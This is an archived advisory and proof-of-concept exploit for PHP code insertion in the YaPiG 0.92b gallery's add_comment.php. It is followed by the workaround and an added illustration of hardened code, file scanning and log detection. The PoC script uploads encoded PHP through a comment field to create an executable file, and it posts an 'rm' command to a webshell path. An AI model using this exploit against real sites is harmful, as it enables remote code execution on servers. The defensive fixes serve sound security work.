yapig-php.txt

Reported by aCiDBiTS, 19 Aug 2004. Source: Packet Storm (packetstormsecurity.com). 128 views.

YaPiG 0.92b is vulnerable to PHP code insertion: add_comment.php and functions.php do not sanitize some comment parameters, so a crafted comment can be written to a file with an arbitrary extension (including .php) under the gallery's photo directory, and PHP code placed in the comment fields is executed when that file is requested.

Code
```php
#!/usr/bin/php
<?

/*

YaPiG 0.92b add_comment PHP Insertion Proof of Concept
By aCiDBiTS acidbitshotmail.com 07-August-2004


Description:

YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.
This Proof of Concept creates a php file that echoes a notice.
First it determines a valid photo directory where to create the script.
Then creates a crafted comment saved in a new .php file. This comment
contains an encoded webshell. Once this .php file is opened, the code
contained creates test.php.

Usage (in my debian box):
php4 -q yapig_addc_poc.php "http://127.0.0.1/yapig-0.92b"


Vulnerability:

There is no user input sanitization of some parameters in add_comment.php
and functions.php. This allows to create a file with any extension, and we
can insert any code in it. Version 0.92b is vulnerable, I haven't tested
older ones.


Workaround. Modify these lines of code:

add_comment.php
line 105:
$comments_file= $gid_dir . $gid . "_" . $phid;
Modify with:
$comments_file= $gid_dir . $gid . "_" . intval($phid);

functions.php, construct_comment_line()
line 699-700:
$linea=$linea . $data_array['mail'] . $SEPARATOR;
$linea=$linea . $data_array['web'] . $SEPARATOR;
Modify with:
$linea=$linea . htmlspecialchars($data_array['mail']) . $SEPARATOR;
$linea=$linea . htmlspecialchars($data_array['web']) . $SEPARATOR;

*/


echo "+-------------------------------------------------------+\n| YaPiG 0.92b add_comment PHP Insertion Proof of Concept |\n| By aCiDBiTS acidbitshotmail.com 07-August-2004 |\n+-------------------------------------------------------+\n\n";


$websh="<?php
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f);
?>";


if($argc<2) die("Usage: ".$argv[0]." URL_to_YaPiG_script\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';


echo "[+] Getting valid gid & photo path ... ";
$webc=get_web($host);
$temp=explode(";gid=",$webc);
$gid=intval($temp[1]);
$temp=explode("photos/",$webc);
$temp=explode("/",$temp[1]);
$path=$temp[0];
if( !$gid || !$path ) die( "Failed!\n\n");
echo "OK\n GID: $gid\n Path: ".$host."photos/".$path."/\n\n";


echo "[+] Creating notice script file ... ";
send_post( $host."add_comment.php?gid=".$gid."&phid=.php",
"tit=a&aut=a&mail=".urlencode($websh)."&web=&msg=a&date=&send=Send");
$webc=get_web( $host."photos/".$path."/".$gid."_.php" );
send_post( $host."photos/".$path."/acidwebshell.php", "c=".urlencode("rm ".$gid."_.php") );
echo "OK\n Now go to: ".$host."photos/".$path."/test.php";


die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\ //||\\\\\n\n");


function get_web($url)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}


function send_post($url,$data)
{
$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL, $url );
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
$data=curl_exec ($ch);
curl_close ($ch);
return $data;
}


/* \ /
(Oo)
//||\\ */


?>
```
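The two defects the advisory names, an unvalidated `phid` concatenated into a filename and comment fields written verbatim, are shown below next to the workaround's hardened forms, together with two checks a gallery operator can run: a scan of a photo directory for files that are neither images nor `<gid>_<phid>` comment files, and a pass over web-server log lines for add_comment.php requests whose `phid` is not a plain integer. This is an added illustration, not YaPiG's own code: the field names, the `|` separator, the image extensions, the directory layout and the log format are assumptions, and the payload and log lines are constructed.

```php
<?php
// Added illustration, not YaPiG's code: the comment-file pattern from the
// advisory in its unsafe and hardened forms, a scan of a photo directory for
// files that should not be there, and a check over web-server log lines for
// requests that carry a non-numeric phid. Field names, the '|' separator and
// the log format are assumptions.
declare(strict_types=1);

const SEPARATOR = '|';

// Unsafe (the pattern the advisory describes): $phid goes into the path
// unvalidated, so phid=".php" yields a comment file named "<gid>_.php".
function unsafe_comments_path(string $gidDir, string $gid, string $phid): string
{
    return $gidDir . $gid . '_' . $phid;
}

// Hardened: the advisory's intval() fix, plus a refusal of ids that are not
// plain positive integers, so the name can only be "<digits>_<digits>".
function safe_comments_path(string $gidDir, string $gid, string $phid): ?string
{
    if (!ctype_digit($gid) || !ctype_digit($phid) || intval($phid) < 1) {
        return null;  // reject instead of silently writing "<gid>_0"
    }
    return $gidDir . intval($gid) . '_' . intval($phid);
}

// Unsafe line builder: user-supplied fields are written verbatim.
function unsafe_comment_line(array $data): string
{
    return $data['mail'] . SEPARATOR . $data['web'] . SEPARATOR . $data['msg'] . "\n";
}

// Hardened: htmlspecialchars() on every field, as the workaround does for
// 'mail' and 'web'; "<?php" becomes "&lt;?php" and is never a PHP open tag.
function safe_comment_line(array $data): string
{
    $fields = [];
    foreach (['mail', 'web', 'msg'] as $name) {
        $fields[] = htmlspecialchars((string)($data[$name] ?? ''), ENT_QUOTES, 'UTF-8');
    }
    return implode(SEPARATOR, $fields) . "\n";
}

// Filesystem check: anything in a photo directory that is neither an image nor
// a "<digits>_<digits>" comment file deserves a look.
function suspicious_files(string $dir): array
{
    $hits = [];
    foreach (scandir($dir) ?: [] as $name) {
        if ($name === '.' || $name === '..') continue;
        if (preg_match('/^\d+_\d+$/', $name)) continue;            // comment file
        if (preg_match('/\.(jpe?g|gif|png)$/i', $name)) continue;  // gallery image
        $hits[] = $name;
    }
    return $hits;
}

// Log check: add_comment.php requests whose phid is not a plain integer.
function suspicious_log_lines(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match('/add_comment\.php\?[^ "]*\bphid=([^& "]*)/', $line, $m)) continue;
        if (!ctype_digit(urldecode($m[1]))) $hits[] = $line;
    }
    return $hits;
}

// Self-check in a scratch directory with a constructed payload.
$dir = sys_get_temp_dir() . '/yapig_demo_' . getmypid() . '/';
mkdir($dir);
$payload = ['mail' => '<?php echo "x"; ?>', 'web' => '', 'msg' => 'a'];

file_put_contents(unsafe_comments_path($dir, '1', '.php'), unsafe_comment_line($payload));
$rejected = safe_comments_path($dir, '1', '.php');   // the hardened path refuses ".php"
$ok       = safe_comments_path($dir, '1', '7');
file_put_contents($ok, safe_comment_line($payload));

echo "hardened path rejected phid '.php': ", var_export($rejected === null, true), "\n";
echo "hardened file content: ", file_get_contents($ok);
echo "suspicious files: ", implode(', ', suspicious_files($dir)), "\n";

// Constructed access-log lines (not from any real server).
$log = [
    '10.0.0.5 - - [07/Aug/2004:10:00:00 +0200] "POST /yapig/add_comment.php?gid=1&phid=12 HTTP/1.1" 200 512',
    '10.0.0.9 - - [07/Aug/2004:10:00:01 +0200] "POST /yapig/add_comment.php?gid=1&phid=.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [07/Aug/2004:10:00:02 +0200] "GET /yapig/photos/2004/1_.php HTTP/1.1" 200 44',
];
echo "suspicious requests: ", count(suspicious_log_lines($log)), "\n";

foreach (suspicious_files($dir) as $f) unlink($dir . $f);
unlink($ok);
rmdir($dir);
```

The hardened path builder goes one step past the advisory's `intval()` by refusing non-numeric ids outright rather than collapsing them to `0`; that is a design choice, not part of the published workaround. Independently of the application fix, a directory that only ever holds images and comment text should not have PHP execution enabled at the web-server level (for Apache with mod_php, `php_flag engine off` in that directory's configuration), so that a stray `.php` file there is served as text rather than run.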


Vulners AI Score: 7.4 (High risk)